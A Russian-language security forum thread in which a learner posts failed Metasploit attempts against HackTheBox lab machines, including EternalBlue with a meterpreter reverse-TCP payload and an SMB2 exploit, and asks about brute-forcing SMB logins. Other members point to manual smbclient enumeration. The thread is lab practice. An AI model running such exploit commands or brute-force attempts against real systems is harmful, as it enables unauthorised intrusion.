• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

хекбокс

addedie

Well-known member
04.08.2019
157
0
BIT
0
вот так делаю
Код:
msf5 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.144
rhost => 10.10.10.144
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.16.91
lhost => 10.10.15.91
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.10.16.91:4444
[*] 10.10.10.144:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 10.10.10.144:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.10.10.144:445      - Scanned 1 of 1 hosts (100% complete)
[-] 10.10.10.144:445 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_eternalblue) >
что нетак непойму
 

addedie

Well-known member
04.08.2019
157
0
BIT
0
блин незнаю с какой стороны подойти к этой стф, система винда 445 порт крутится на 80ом какаято фигня непонятная.....незнаю даже как подойти и что делать....
называется решил попробоват ьсебя в деле
сканю дирбустом

ищу того кто присоеденится к прохождению лаб, пишите в личку

вот это что такое ктонибудь знает?
Код:
  <div class="wrapper"><a class="site-title" rel="author" href="/">RE Blog</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>
в теге path
 

addedie

Well-known member
04.08.2019
157
0
BIT
0
пробую другую тачку
Код:
msf5 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > exploit

[*] 10.10.10.178:445 - Connecting to the target (10.10.10.178:445)...
[*] 10.10.10.178:445 - Sending the exploit packet (906 bytes)...
[*] 10.10.10.178:445 - Waiting up to 180 seconds for exploit to trigger...
[*] Started bind TCP handler against 10.10.10.178:4444

[*] Exploit completed, but no session was created.
тоже нефига
 

Rook

Codeby Team
Red Team
09.01.2019
727
711
BIT
4
пробую другую тачку
Код:
msf5 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > exploit

[*] 10.10.10.178:445 - Connecting to the target (10.10.10.178:445)...
[*] 10.10.10.178:445 - Sending the exploit packet (906 bytes)...
[*] 10.10.10.178:445 - Waiting up to 180 seconds for exploit to trigger...
[*] Started bind TCP handler against 10.10.10.178:4444

[*] Exploit completed, but no session was created.
тоже нефига

А ты сканером вообще прогоняешь на уязвимость? Или от балды каждый смб юзаешь?
 

addedie

Well-known member
04.08.2019
157
0
BIT
0
от болды юзал про сканеры незнаю есть мануал?
один доступ я уже врубил в стфке без метасплоита чистыми движениями рук...
но вот брутиться эта смб никак нехочет, у меня уже логины есть юзеров а брутить небрутит обваливается
 

addedie

Well-known member
04.08.2019
157
0
BIT
0
винда называется Nest в самом низу списка тачек


писать чтоли самому брут смб на питоне даж незнаю осилю ли
 
Последнее редактирование:

evil

Green Team
21.12.2016
16
2
BIT
0
Nest - это ящик на Hackthebox.eu (10.10.10.178) Он пропатчен, ошибки исправлены и поломать его через msf уже не получиццо. Там идея автора другая - перечисление из smbclient, поиск файлов с интересной информацией, и т.д.
 

Xulinam

Grey Team
02.03.2017
1 015
240
BIT
81
винда называется Nest в самом низу списка тачек


писать чтоли самому брут смб на питоне даж незнаю осилю ли
там совсем другой принцип

пробую другую тачку
ищи внимательно )) там будет те усер и пароль в смб найдешь)) потом тебе нужно будет поиграть с xml )))

поробуй openadmin )) он роще))как по мне)
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!